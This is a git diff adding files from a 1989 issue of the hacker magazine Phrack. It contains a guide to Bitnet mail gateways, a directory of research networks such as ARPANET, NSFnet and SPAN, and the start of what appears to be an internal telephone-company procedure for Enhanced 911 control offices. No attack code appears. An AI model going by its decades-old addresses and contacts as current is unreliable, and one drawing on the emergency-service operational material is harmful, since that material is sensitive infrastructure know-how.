+the people in the destination network.
+
+
+Foundations Abound
+~~~~~~~~~~~~~~~~~~
+Just as there are servers and services in Bitnet, there are similar
+counterparts in the other networks as well.  There are many electronic digests
+and servers that are similar to Bitnet servers available on several of the
+other networks.
+_______________________________________________________________________________
+
+Gateways To Non-Standard Networks - Intermail
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Intermail is perhaps the most interesting exception to standard gateways.  It's
+better to just show you what I mean rather than try to really technically
+describe the process.  With Intermail, you can access networks you probably
+never thought were accessible.
+
+I have included the instructions for using the Intermail system for
+transmitting computer mail between users in the MCI-Mail system, the GTE
+Telemail system, the Compmail/Dialcom 164 system, and the NFS-Mail/Dialcom 157
+system to the ARPA-Mail system.  The Intermail system may be used in either
+direction.
+
+Mail to be sent to MCI Mail, GTE Telemail, Compmail, or NSF-Mail is sent to the
+"Intermail" mailbox on the local mail system.  The Intermail system operates by
+having a program service mailboxes in both the local and the destination mail
+systems.  When the right information is supplied at the beginning of a message,
+the program forwards those messages into the other mail system.
+
+In order for a message to be delivered to a mailbox in another mail system,
+forwarding information must be included at the beginning of the text of each
+message.  This forwarding information tells the mail forwarding program which
+mail system to forward the message to, and which mailboxes to send it to.  This
+information is in the form:
+
+      Forward: <mail system>
+      To: <user mailbox>
+      <blank line>
+
+The syntax allowed on the "To:" line is that of the system being forwarded
+into.  In ARPA-Mail it is also possible to send to a list of CC recipients in
+any of the mail gateway systems.  See the examples for further details.
+
+In either direction, the local Subject field of the message to Intermail is
+used as the Subject field of the message delivered in the other mail system.
+
+
+Sending To Non-Standard Networks From Bitnet
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In this direction, the Internet user must first send mail to the Intermail
+mailbox on the ARPA-Internet.  The address of "Intermail" is
+"INTERMAIL@ISI.EDU".  Next, the Mailbox forwarding information must be added at
+the beginning of the text of each message.  The names of the mailboxes are
+MCI-MAIL, TELEMAIL (for GTE Telemail), COMPMAIL, and NSF-MAIL.
+
+This information is in the form:
+
+      Forward: <Type name of mailbox here>
+      To: <a valid address on the system you're forwarding to>
+      <blank line>
+      <Message...>
+
+
+Please Note:  Although CompuServe (CIS), Telex, and FAX are accessible from
+              MCI-Mail, the Intermail gateway does not support these services.
+              However, there is a Bitnet-CompuServe gateway, but that will be
+              discussed in the next section of this file.
+
+
+Sending To Bitnet From Non-Standard Networks
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Supposing that you have an account on MCI-Mail, GTE Telemail, Compmail, or
+NSF-Mail and you would like to mail to someone on Bitnet, you would direct
+your mail to one of the following addresses;
+
+         "INTERMAIL" (actually MCI-ID "107-8239") in MCI-Mail,
+         "INTERMAIL/USCISI" in GTE Telemail,
+         "164:CMP00817" in Compmail/Dialcom 164, and
+         "157:NSF153" in NSF-Mail
+
+Once you have done this, you actually type the following as the first two lines
+in the mail:
+
+     Forward: ARPA
+     To: KNIGHT%MSPVMA.BITNET@CUNYVM.CUNY.EDU
+     <blank line>
+     <Message...>
+
+In this example, KNIGHT is the userid and MSPVMA is the Bitnet node.
+CUNYVM.CUNY.EDU is the Internet gateway to ARPAnet.  It's really just that
+simple.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+In case of questions or problems using Intermail, please send a message to
+Intermail-Request@ISI.EDU.
+_______________________________________________________________________________
+
+CompuServe
+~~~~~~~~~~
+The gateway is not yet live as of this writing.  Testing on it has been delayed
+somewhat because of high-priority projects inside CompuServe.  However, it
+might be a safe bet that by the time you read this that the gateway will be
+complete.
+
+The specific mechanism is that the gateway machine, 3B2/400 named Loquat,
+believes that it has a UUCP neighbor "compuserve" which polls it.  In reality,
+the UUCP connection is a lie all around, but the gateway starts up on an hourly
+basis, pokes through the UUCP queue, finds mail aimed at CompuServe, and
+creates script language on the fly suitable for a utility called Xcomm 2.2 to
+call CompuServe, download any waiting mail, and upload any queued mail.
+
+Appropriate header hacking is done so that CompuServe looks like just another
+RFC-compliant entity on the Internet, and the Internet looks like yet another
+gatewayed system from the perspective of the CompuServe subscriber - a very
+minor modification to the usual syntax used in their mailer is needed, but
+this project has provided the impetus for them to generalize the mechanism,
+something they had apparently not needed before.
+
+So that's where it stands.  Loquat speaks with machines at Ohio State.  At the
+moment, there is a problem preventing mail passage except between CompuServe
+and Ohio State, while they finish development and testing.  Also, part of the
+header hacking done is to make CompuServe IDs look right on the Internet - the
+usual 7xxxx,yyy is a problem due to the presence of the ",".
+_______________________________________________________________________________
+
+Easynet
+~~~~~~~
+A mail gateway between Easynet and the UUCP network and DARPA Internet
+(including CSNET) is provided by the Western Research Laboratory in Palo Alto,
+California.  Hopefully this service will provide improved communications
+between the DEC community and the Usenet and Internet communities.
+
+
+Mailing From A Bitnet Site To An Easynet Node
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+To mail a message from an Internet site to an Easynet node (say MSPVAX), you
+type:
+
+To: user%mspvax.dec.com@decwrl.dec.com
+
+A few other forms are still accepted for backward compatibility, but their use
+is discouraged and they will not be described here.
+
+
+Mailing From Easynet To Bitnet
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+For people on Easynet who would like to mail to people on Bitnet the following
+information may be of interest.
+
+The gateway supports connection to Bitnet using a pseudo-domain syntax.  These
+addresses are translated by the gateway to the proper form to address the
+gateway into Bitnet.  To address users in Bitnet you type:
+
+To: DECWRL::"user@host.bitnet"
+
+(Example:  To: DECWRL::KNIGHT@MSPVAX.BITNET)
+_______________________________________________________________________________
+
+Mailnet
+~~~~~~~
+The Bitnet-Mailnet Gateway no longer exists.  EDUCOM's Mailnet Service was
+discontinued after June 30, 1987 in agreement with MIT.
+_______________________________________________________________________________
+
+DASnet
+~~~~~~
+DASnet is one of the networks that is connected to AppleLink.
+
+
+Sending to DASnet from Bitnet:
+
+1. In the "TO" field, enter the DASnet gateway address: XB.DAS@STANFORD.BITNET
+2. In the "SUBJECT" field, enter the DASnet user id (such as [1234AA]joe)
+
+Example (0756AA is the DASnet address and randy is the user on that system):
+
+To: XB.DAS@STANFORD.BITNET
+Subject: [0756AA]randy
+
+3. If you type a "!" after the address in the subject field, you can insert
+   comments, but the subject line must be limited to 29 characters.
+   Example; Subject:  [0756AA]randy!Networks are cool
+
+
+Sending to Bitnet from DASnet
+
+1. In the "TO" field, enter the BITNET address followed by "@dasnet"
+2. Use the "SUBJECT" field for comments.
+
+Example:
+
+To: knight@umcvmb.bitnet@dasnet#MSubject: Gateways
+
+Don't be confused, there are two @s and a  at the end.
+_______________________________________________________________________________
+
+      Gateways Between Bitnet And Other Networks Not Previously Detailed
+      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+            ______________________________________________________
+           |              |                   |                   |
+           | "u" = UserId | "h" = Host (Node) | "d" = Node (Host) |
+           |______________|___________________|___________________|
+
+
+To: CSNET Phonenet                          <u>@<h>.csnet
+To: JANET (Domains: U: uk)                  <u>%<d>.U@ac.uk
+To: EAN (Domains: E: cdn, dfn, etc.)        <u>@<d>.E
+To: COSAC                                   <h>/<u>@france.csnet
+To: Xerox Internet (Domains: R: A registry) <u>.R@xerox.com
+To: DEC's Easynet <*Detailed Earlier*>      <u>%<h>.dec.com@decwrl.dec.com
+To: IBM's VNET                              <u>@vnet
+To: ACSNET (Domains: A: oz.au)              <u>%<d>.A@<g>
+To: UUCP                                    h1!h2!<h>!<u>@psuvax1
+To: JUNET (Domains: J: junet)               <u>%<d>.J@csnet-relay.csnet
+To: JANET                                   <u>%U.<d>@ac.uk
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+To: BITNET
+
+From
+ARPA Internet           <u>%<h>.bitnet@cunyvm.cuny.edu
+CSNET Phonenet          <u>%<h>.bitnet@relay.cs.net
+JANET                   <u>%<h>@uk.ac.rl.earn
+EAN                     <u>@<h>.bitnet
+COSAC                   adi/<u>%<h>.bitnet@relay.cs.net
+ACSNET                  <u>%<h>.bitnet@munnari.oz
+UUCP                    psuvax1!<h>.bitnet!<u>
+JUNET                   <u>@<h>.bitnet
+_______________________________________________________________________________
+
+
+Conclusion
+~~~~~~~~~~
+Now that you understand how to mail to the other networks by making use of the
+gateways, we will begin looking at the other networks themselves.  As my
+greatest area of expertise is Bitnet, I will cover the other networks in less
+detail.  If they interest you, I'm sure you will find a way to learn more about
+them.  So read Chapter Four of The Future Transcendent Saga -- Frontiers.
+
+:Knight Lightning
+_______________________________________________________________________________
diff --git a/phrack24/4.txt b/phrack24/4.txt
new file mode 100644
index 0000000..c937256
--- /dev/null
+++ b/phrack24/4.txt
@@ -0,0 +1,465 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 24, File 4 of 13
+
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+       <>                                                            <>
+       <>                          Frontiers                         <>
+       <>                          ~~~~~~~~~                         <>
+       <>        Chapter Four of The Future Transcendent Saga        <>
+       <>                                                            <>
+       <>                 Beyond Bitnet Lies Infinity                <>
+       <>                                                            <>
+       <>                Presented by Knight Lightning               <>
+       <>                      February 12, 1989                     <>
+       <>                                                            <>
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+Welcome to the final chapter of The Future Transcendent Saga... or is it?  Can
+there ever really be a final chapter to the future?  In any case, I have
+collected information on some of the various other networks that you may comes
+across through your use of Bitnet.  These listings are more of a summary than a
+detail guide (like Utopia was for Bitnet).  However, I think you'll make good
+use of the information presented here.  Much of the information in this file is
+based on examination of research conducted in July, 1987.  Any errors due to
+the advancement in technology and the difference in time are apologized for.
+
+The networks indexed in this file include the government agency networks
+ARPANET, MILNET, MFENET, and NSFnet; and the user-formed networks CSNET,
+HEANET, SPAN, TEXNET, UUCP, and USENET.
+
+This file is not intended to be a hackers guide, but merely a directory of some
+of the networks.
+
+One last thing to mention... the major top level domains on the Internet are:
+
+     .EDU   Educational Institutions
+     .COM   Commercial
+     .GOV   Government
+     .MIL   Military
+     .ORG   Miscellaneous Orgainizations (that don't fit elsewhere)
+_______________________________________________________________________________
+
+                          GOVERNMENT AGENCY NETWORKS
+                          ~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ARPANET and MILNET
+
+In 1969 the Defense Advanced Research Projects Agency (DARPA) began a research
+program to advance computer networking.  The experimental packet-switched
+network that emerged was called ARPANET, and it allowed computers of different
+types to communicate efficiently.  Using ARPANET technology, the Defense Data
+Network (DDN) was created in 1982 to encompass the existing ARPANET and other
+Department of Defense (DoD) computer networks.  The DDN uses the DoD Internet
+Protocol Suite, including TCP/IP (Transmission Control Protocol/Internet
+Protocol) and associated application protocols.
+
+A splitting of the ARPANET was begun in 1983 and completed in 1984.  The result
+was two networks, an experimental research and development network called
+ARPANET, and a non-classified operational military network called MILNET.
+Gateways interconnect the two networks.  The backbones of each of the networks
+consist of Packet Switched Nodes (PSNs), most of which are connected with 56 Kb
+terrestrial lines.  As of January 1987, the ARPANET had 46 PSNs, and MILNET had
+117 PSNs in the U.S. and 33 in Europe and the Pacific.
+
+While ARPANET and MILNET make up part of the DDN, the DDN and other networks
+works which share the same protocols make up the ARPA Internet.  CSNET X25net,
+which uses the TCP/IP protocols interfaced to the public X.25 network, is an
+example of a network which is part of the ARPA Internet and is not a part of
+the DDN.
+           ________________________________________
+          |                     +--------------+   |
+          |                     | CSNET X25net |   |
+          |                     +--------------+   |
+          |  +---------------+                     |
+          |  | DDN           |                     |
+          |  |   +---------+ |                     |
+          |  |   | Arpanet | |                     |
+          |  |   +---------+ |                     |
+          |  |               |                     |
+          |  |   +---------+ |                     |
+          |  |   | Milnet  | |                     |
+          |  |   +---------+ |                     |
+          |  +---------------+       ARPA Internet |
+          |________________________________________|
+
+Policy, access control and funding for the ARPANET are provided by DARPA's
+Information Processing Techniques Office (IPTO).  ARPANET and MILNET operation
+and management are provided by the Defense Communications Agency's DDN Program
+Management Office (DDN PMO).
+
+Use of the ARPANET is limited to users engaged in experimental research for the
+U.S. government, or government-sponsored research at universities.  Because it
+is not meant to compete with commercial networks, it is not intended for
+operational communication needs or use by the general public.
+
+Services available on ARPANET and MILNET include remote login, file transfer,
+mail, time, and date.  Mail addressing on both of the networks is of the form
+user@domain, where domain refers to a full qualified domain name composed of a
+string of one or more subdomains separated by a period, ending with a top-level
+domain.  Examples of top-level domains:  edu, com, gov, mil, net, org, jp, au,
+uk.  Examples of fully qualified domain names: kentarus.cc.utexas.edu,
+relay.cs.net, icot.jp.
+
+The DDN funds a Network Information Center (NIC), located at SRI International
+in Menlo Park, California, which provides user services to DDN users via
+electronic mail (NIC@SRI-NIC.ARPA), telephone (800-235-3155) and U.S. mail:
+DDN Network Information Center, SRI International, Room EJ291, 333 Ravenswood
+Avenue, Menlo Park, CA 94025.  The telephone service is available Monday through
+Friday, 7a.m to 4p.m., Pacific time.
+
+Much information is also available on-line on SRI-NIC.ARPA, via telnet or
+anonymous ftp (login "anonymous", password "guest").  The file
+NETINFO:NETINFO-INDEX.TXT contains an index of these on-line files.
+_______________________________________________________________________________
+
+MFENET
+
+MFEnet is the Department of Energy's (DOE) magnetic fusion energy research
+network.  It was established in the mid-1970's to support access to the MFE
+Cray 1 supercomputer at the Lawrence Livermore National Laboratory.  The
+network uses 56-kbs satellite links, and is designed to provide terminal access
+to the Cray time-sharing system (CTSS), also developed at the Lawrence
+Livermore Laboratory.  The network currently supports access to Cray 1, Cray
+X-MP/2, Cray 2, and Cyber 205 supercomputers.  The network uses special-purpose
+networking software developed at Livermore, and, in addition to terminal
+access, provides file transfer, remote output queuing, and electronic mail, and
+includes some specialized application procedures supporting interactive
+graphics terminals and local personal computer (PC)-based editing.  Access to
+the network is in general restricted to DOE-funded researchers.  A couple of
+years ago, the network was expanded to include the DOE-funded supercomputer at
+Florida State University.  MFEnet is funded by DOE and managed by Livermore.
+
+MFEnet has been successful in supporting DOE supercomputer users.  However,
+the specialized nature of the communications protocols is now creating
+difficulties for researchers who need advanced graphics workstations that use
+the UNIX BSD 4.2 operating system and the TCP-IP protocols on LAN's.  For these
+and other reasons, DOE is examining how best to migrate MFEnet to the TCP-IP,
+and later to the OSI, protocols.
+
+The combination of the CTSS operating system and the MFEnet protocols creates
+an effective interactive computing environment for researchers using Cray
+supercomputers.  For this reason, two of the new NSF national supercomputer
+centers -- San Diego (SDSC) and Illinois -- have chosen the CTSS operating
+system.  In SDSC's case, the MFENET protocols have also been chosen to support
+the SDSC Consortium network.  In Illinois case, a project to implement the
+TCP-IP protocols for the CTSS operating system has been funded by the NSFnet
+program, and these developments will be shared with SDSC (and with DOE) to
+provide a migration path for the SDSC Consortium network.
+
+Mail can be sent to people on MFEnet by using this format;
+
+user%site.MFENET@NMFEDD.ARPA
+_______________________________________________________________________________
+
+NSFNET
+
+NSFnet began in 1986 as a communications network to facilitate access to
+NSF-funded national supercomputer centers.  It is evolving into a general
+purpose internet for research and scientific information exchange.  The network
+has a three-level component structure comprised of a backbone, several
+autonomously administered wide-area networks, and campus networks.  The
+backbone includes the following supercomputer centers:
+
+    - National Center for Supercomputing Applications, University of Illinois,
+      Urbana (UIUC)
+    - Cornell National Supercomputer Facility, Cornell University (Cornell)
+    - John von Neumann National Supercomputer Center, Princeton, New Jersey
+      (JVNC)
+    - San Diego Supercomputer Center, University of California, San Diego
+      (SDSC)
+    - Pittsburgh Supercomputer Center (Westinghouse Electric Corp,
+      Carnegie-Mellon University, University of Pittsburgh)
+    - Scientific Computing Division of the National Center for Atmospheric
+      Research, Boulder, Colorado (NCAR)
+
+Upper layer protocols in use on the NSFnet backbone are the TCP/IP protocols.
+The backbone became operational in July of 1986.  It was composed of seven 56
+kps links between six IP gateways.  These gateways are LSI 11/73 systems.  An
+upgrade to T1 links (1.544 Mps) was established in the latter part of 1987.
+There are plans to adopt the OSI networking protocols as the software becomes
+available.
+
+NSF-funded component networks include:
+
+    BARRNET - California's Bay Area Regional Research Network
+    MERIT - Michigan Educational Research Network
+    MIDNET - Midwest Network
+    NORTHWESTNET - Northwestern states
+    NYSERNET - New York State Educational and Research Network
+    SESQUINET - Texas Sesquicentennial Network
+    SURANET - Southeastern Universities Research Association Network
+    WESTNET - Southwestern states
+    JVNCNET - consortium network of JVNC
+    SDSCNET - consortium network of SDSC
+    PSCAAnet - consortium network of the Pittsburgh Supercomputer Center
+
+Some of the component networks preceded NSFnet, and some of them have just
+recently been established.  Each of the component networks is connected to the
+backbone.  Information about the status of any NSFnet component network is
+available from the NSFnet Network Service Center (NNSC).  Monthly reports on
+the status of the backbone and component networks are also available on-line
+through the CSNET Info-Server.  Send a message to info-server@sh.cs.net with
+the following message body:
+
+    REQUEST: NSFNET
+    TOPIC: NSFNET-HELP
+    REQUEST:END
+
+These reports may also be retrieved by anonymous ftp (login "anonymous",
+password "guest") from sh.cs.net, in the directory "nsfnet." [FTP stands for
+File Transfer Protocol]
+
+Other autonomous networks connected to the NSFnet backbone include ARPANET,
+BITNET, CSNET, and USAN (the University Satellite Network of the National
+Center for Atmospheric Research).
+
+Interesting projects associated with NSFnet include implementation of the gated
+routing daemon which handles the RIP, EGP and HELLO routing protocols and runs
+on 4.3BSD, Ultrix TM, GOULD UTX/32 TM, SunOS and VMS TM (Cornell University
+Theory Center); implementation of TCP/IP for the CTSS operating system
+supporting TELNET and FTP (University of Illinois); and a satellite experiment
+providing 56 kps links between distant ethernets using Vitalink technology
+(NCAR).
+
+Management of the NSFnet is in an interim form with duties shared among The
+University of Illinois, Cornell University, the University of Southern
+California Information Sciences Institute, and University Corporation for
+Atmospheric Research.  The NSFnet project is administered by the Division of
+Network and Communications Research and Infrastructure, which is part of the
+Computer and Information Science and Engineering Directorate at NSF.
+
+Further information is available from the NSFnet Network Service Center (NNSC),
+BBN Laboratories Inc., 10 Moulton Street, Cambridge, MA 02238. Assistance can
+also be obtained by electronic mail to nnsc@nnsc.nsf.net, or by calling
+617-497-3400.  The NNSC is run by Bolt, Beranek and Newman, and is an
+NSF-funded project of the University Corporation for Atmospheric Research.
+_______________________________________________________________________________
+
+                             USER-FORMED NETWORKS
+                             ~~~~~~~~~~~~~~~~~~~~
+
+CSNET
+
+In 1980 a proposal was presented to the National Science Foundation to fund a
+computer science research network to link any university, commercial or
+government organizations involved in research or advanced development in
+computer science and computer engineering.  NSF provided funding for the period
+for 1981 to 1985, and CSNET was established.  This single logical network today
+connects approximately 200 computers on three physical networks.  These
+component physical networks are Phonenet, X25net and a subset of the ARPANET.
+Phonenet is a store-and-forward network using MMDF software over public
+telephone lines to provide electronic mail service.  X25net utilizes the public
+X.25 packet switched network Telenet, interfaced with TCP/IP, to provide
+electronic mail, file transfer and remote login.  Some ARPANET hosts are also
+members of CSNET.  The computers linked by CSNET are in the U.S., Europe,
+Canada, Israel, Korea and Japan.  Addressing in CSNET is in the ARPA Internet
+domain style.
+
+In 1981 a contract was arranged with Bolt, Beranek and Newman, Inc. to provide
+information, user and technical services for CSNET, and the CSNET Coordination
+and Information Center (CIC) was established.  The CIC handles the daily
+management of the network, and oversight is provided by the CSNET Executive
+Committee.  The network is supported by membership fees.
+
+The CIC maintains a User Name Server database, which is accessible through the
+ns command on CSNET hosts running appropriate software, or by telnet to the
+CSNET service host, sh.cs.net (login "ns", no password required).  There is
+also much information available via anonymous ftp to sh.cs.net (login
+"anonymous", password "guest"), particularly in the directory "info."  The Info
+Server also provides a means for retrieving this information.  To utilize the
+Info Server, send mail to infoserver@sh.cs.net with the following lines in the
+message body:
+
+            REQUEST:  INFO
+            TOPIC:  HELP
+            REQUEST:  END
+
+The on-line information includes software, policy documents, information on
+other networks, site lists and mailing list archives.
+
+CSNET Foreign Affiliates and their gateways are:
+
+     CDNNET -- Canadian Academic Network, University of British Columbia.
+
+     SDN -- System Development Network (SDN) is an R&D computer network,
+            consisting of computers of R&D communities in Republic of Korea,
+            with a gateway at KAIST, Korea Advanced Institute of Science and
+            Technology, Seoul.  It has mail connection to CSNET/Internet,
+            USENET/EUNET/UUCP Net and Pacific countries like Australia,
+            Indonesia, Hong Kong, Singapore and Japan.
+
+     SUNET -- Swedish University Network, Chambers University of Technology,
+              Gothenburg.
+
+     CHUNET -- Swiss University Network, ETH-Zentrum, Zurich.
+
+     Inria -- French University Network, Institute National de Recherce en
+              Informatique, Rocquencourt.
+
+     DFN -- Deutches Forschungsnetz, GWD-Gesellschaft fuer Mathematick und
+            Datenvararbiten, Schloss Birlinghoven, St. Augustin.
+
+     JUNET -- Japanese University Network, University of Tokyo.
+
+     Finnish University Network, Helsinki University, Helsinki.
+
+     AC.UK -- Academic Community, United Kingdom, University College, London.
+
+     ACSNET -- A UUCP-based academic network in Australia, University of
+               Melbourne.
+
+     New Zealand Academic Network, Waikato University, Hamilton.
+
+     Israeli Academic Network, Hebrew University of Jerusalem.
+
+For more information contact CSNET CIC, BBN Laboratories Inc., 10 Moulton
+Street, Cambridge, MA 02238, or send  electronic mail to cic@sh.cs.net
+(cic@csnet-sh.arpa).  A 24-hour hotline is also available, (617) 497-2777.
+_______________________________________________________________________________
+
+HEANET
+
+HEAnet is a network linking the Universities and National Institutes for Higher
+Education in the Republic of Ireland.  The following institutions belong to
+HEANET:
+
+     NIHED:  National Institute for Higher Education, Dublin
+     NIHEL:  National Institute for Higher Education, Limerick
+     MAY:    St. Patrick's College, Maynooth
+     TCD:    Trinity College, Dublin
+     UCC:    University College, Cork
+     UCD:    University College, Dublin
+     UCG:    University College, Galway
+
+The abbreviations on the left are used to form the network addresses for the
+hosts belonging to each institution.  Addresses use the form:
+
+     host.institution.IE  (for example VAX2.NIHED.IE)
+
+HEANET is connected to EARN/Bitnet/Netnorth by a gateway at University College,
+Dublin.  Mail for HEANET should be sent as a BSMTP "job" to MAILER at IRLEARN.
+_______________________________________________________________________________
+
+SPANet
+
+The Space Physics Analysis Network (SPAN) became operational in 1981, and was
+the result of a pilot project at Marshall Space Flight Center funded by NASA
+(Space Plasma Physics Branch, Office of Space Science).  The network is a
+mission-independent data system testbed, intended to address problems of
+exchanging data (raw and processed), analysis software, graphic images and
+correspondence between researchers in several disciplines, including
+Solar-Terrestrial, Interplanetary and Planetary Physics, Astrophysics,
+Atmospherics, Oceans, Climate and Earth Science.  A perception that
+multidisciplinary correlative research in solar-terrestrial physics would
+increase in the 1980's, that standards were lacking in scientific databases,
+and that support was required for the display of device independent graphic
+images, all motivated the establishment of SPAN.  SPAN has therefore developed
+to facilitate space data analysis and address significant unresolved problems
+of scientific data exchange and correlation.
+
+The Data Systems Users Working Group, formed in 1980, provides guidance and
+policy recommendations to SPAN.  Daily operation of the network is performed by
+a network and project manager, a project scientist, routing center managers,
+and managers at the local nodes.
+
+SPAN nodes communicate using a variety of transmission media (fiber optics,
+coax, leased telephone lines) and lower layer protocols (ethernet, X.25,
+DDCMP), and nearly all SPAN hosts use the DECnetTM upper layer protocols. There
+are plans to migrate to the emerging OSI protocols as software becomes
+available.
+
+Currently SPAN connects over 1200 computers throughout the United States,
+Europe, Canada, and Japan (leading to all of the hacker related trouble on the
+network, such as the Mathias Speer incident).  The network backbone in the
+United States consists of redundant 56 kps links between 5 DECnet routing
+centers:
+
+    1.  NASA's Johnson Space Center (Houston, Texas)
+    2.  NASA and Cal Tech's Jet Propulsion Laboratory (Pasadena, California)
+    3.  NASA's Marshall Space Flight Center (Huntsville, Alabama)
+    4.  NASA's Goddard Space Flight Center (Greenbelt,  Maryland)
+    5.  NASA's Ames Research Center (Moffett Field, California)
+
+Tail circuits connect SPAN member institutions to the closest routing center,
+in most cases with leased lines at a minimum of 9.6 kps.
+
+SPAN is gatewayed to CSNET, ARPANET, BITNET, GTE Telenet, JANET and the NASA
+Packet Switched System (NPSS).  SPAN is joined to TEXNET, HEPnet and other
+DECnetTM wide area networks.  Services available to SPAN nodes include
+electronic mail, remote file transfer and remote login.
+
+Additional information is available from the SPAN Network Information Center
+(SPAN-NIC) located at the National Space Science Data Center, NASA Goddard
+Space Flight Center, Greenbelt, Maryland 20771.  Assistance is also available
+by electronic mail at NSSDCA::SPAN_NIC_MGR.
+_______________________________________________________________________________
+
+TEXNET
+
+Most of TEXNET became operational in 1986, although pieces of this network
+existed earlier.  The purpose of the network is to link computers at Texas
+universities which run the DECnetTM upper layer protocols.  Lower layer
+protocols in use on the network are ethernet (IEEE 802.3) and DDCMP (Digital
+Data Communication Message Protocol).  TEXNET currently connects over 450
+machines in 14 cities.  The network backbone consists of DECnetTM routers, and
+some synchronous links, connected via leased lines.  9600 bps and 56 Kbps lines
+are used.
+
+Gateways exist from TEXNET to SPAN, BITNET and the ARPA Internet.  Services
+provided include electronic mail, file transfer and remote login.
+
+Operational and policy management of the network is by consensus of an informal
+management group composed of managers from each member institution.
+
+The following institutions are TEXNET members:
+
+    Baylor University
+    Houston Area Research Center
+    Pan American University
+    Sam Houston State University
+    Southwest Texas State University
+    Texas A & M University
+    University of Houston
+    University of Texas at Arlington
+    University of Texas at Austin
+    University of Texas at El Paso
+    University of Texas at Dallas
+    University of Texas at Permian Basin
+    University of Texas at San Antonio
+    University of Texas at Tyler
+    University of Texas Health Center at Tyler
+    University of Texas Health Science Center at Dallas
+    University of Texas Health Science Center at Houston
+    University of Texas Health Science Center at San Antonio
+    University of Texas Medical Branch Galveston
+    University of Texas System Cancer Center
+    University of Texas System Center for High Performance Computing
+    University of Texas Office of Land Management
+_______________________________________________________________________________
+
+UUCP and USEnet
+
+The UUCP network was started in the 1970's to provide electronic mail and file
+transfer between UNIX systems.  The network is a host-based store-and-forward
+network using dialup telephone circuits and operates by having each member site
+dialup the next UUCP host computer and send and receive files and electronic
+mail messages.  The network uses addresses based on the physical path
+established by this sequence of dialups connections. UUCP is open to any UNIX
+system which chooses to participate.  There are "informal" electronic mail
+gateways between UUCP and ARPANET, BITNET, or CSNET, so that users of any of
+these networks can exchange electronic mail.
+
+USENET is a UNIX news facility based on the UUCP network that provides a news
+bulletin board service.  USEnet has both academic and commercial members and
+affiliates in Europe, Asia, and South America.  Neither UUCP nor USENET has a
+central management; volunteers maintain and distribute the routing tables for
+the network.  Each member site pays its own costs and agrees to carry traffic.
+Despite this reliance on mutual cooperation and anarchic management style, the
+network operates and provides a useful, if somewhat unreliable, and low-cost
+service to its members.  Over the years the network has grown into a world-wide
+network with thousands of computers participating.
+
+                              "The Future Is Now"
+______________________________________________________________________________
diff --git a/phrack24/5.txt b/phrack24/5.txt
new file mode 100644
index 0000000..2c7f96c
--- /dev/null
+++ b/phrack24/5.txt
@@ -0,0 +1,409 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 24, File 5 of 13
+
+         [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
+         []                                                        []
+         []              Control Office Administration             []
+         []              Of Enhanced 911 Services For              []
+         []       Special Services And Major Account Centers       []
+         []                                                        []
+         []                   By The Eavesdropper                  []
+         []                                                        []
+         []                       March, 1988                      []
+         []                                                        []
+         [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
+
+
+Description of Service
+~~~~~~~~~~~~~~~~~~~~~~
+The control office for Emergency 911 service is assigned in accordance with the
+existing standard guidelines to one of the following centers:
+
+     o  Special Services Center (SSC)
+     o  Major Accounts Center (MAC)
+     o  Serving Test Center (STC)
+     o  Toll Control Center (TCC)
+
+The SSC/MAC designation is used in this document interchangeably for any of
+these four centers.  The Special Services Centers (SSCs) or Major Account
+Centers (MACs) have been designated as the trouble reporting contact for all
+E911 customer (PSAP) reported troubles.  Subscribers who have trouble on an
+E911 call will continue to contact local repair service (CRSAB) who will refer
+the trouble to the SSC/MAC, when appropriate.
+
+Due to the critical nature of E911 service, the control and timely repair of
+troubles is demanded.  As the primary E911 customer contact, the SSC/MAC is in
+the unique position to monitor the status of the trouble and insure its
+resolution.
+
+System Overview
+~~~~~~~~~~~~~~~
+The number 911 is intended as a nationwide universal telephone number which
+provides the public with direct access to a Public Safety Answering Point
+(PSAP).  A PSAP is also referred to as an Emergency Service Bureau (ESB).  A
+PSAP is an agency or facility which is authorized by a municipality to receive
+and respond to police, fire and/or ambulance services.  One or more attendants
+are located at the PSAP facilities to receive and handle calls of an emergency
+nature in accordance with the local municipal requirements.
+
+An important advantage of E911 emergency service is improved (reduced) response
+times for emergency services.  Also close coordination among agencies providing
+various emergency services is a valuable capability provided by E911 service.
+
+1A ESS is used as the tandem office for the E911 network to route all 911 calls
+to the correct (primary) PSAP designated to serve the calling station.  The
+E911 feature was developed primarily to provide routing to the correct PSAP for
+all 911 calls.  Selective routing allows a 911 call originated from a
+particular station located in a particular district, zone, or town, to be
+routed to the primary PSAP designated to serve that customer station regardless
+of wire center boundaries.  Thus, selective routing eliminates the problem of
+wire center boundaries not coinciding with district or other political
+boundaries.
+
+The services available with the E911 feature include:
+
+       Forced Disconnect         Default Routing
+       Alternative Routing       Night Service
+       Selective Routing         Automatic Number Identification (ANI)
+       Selective Transfer        Automatic Location Identification (ALI)
+
+
+Preservice/Installation Guidelines
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+When a contract for an E911 system has been signed, it is the responsibility of
+Network Marketing to establish an implementation/cutover committee which should
+include a representative from the SSC/MAC.  Duties of the E911 Implementation
+Team include coordination of all phases of the E911 system deployment and the
+formation of an on-going E911 maintenance subcommittee.
+
+Marketing is responsible for providing the following customer specific
+information to the SSC/MAC prior to the start of call through testing:
+
+o  All PSAP's (name, address, local contact)
+o  All PSAP circuit ID's
+o  1004 911 service request including PSAP details on each PSAP
+   (1004 Section K, L, M)
+o  Network configuration
+o  Any vendor information (name, telephone number, equipment)
+
+The SSC/MAC needs to know if the equipment and sets at the PSAP are maintained
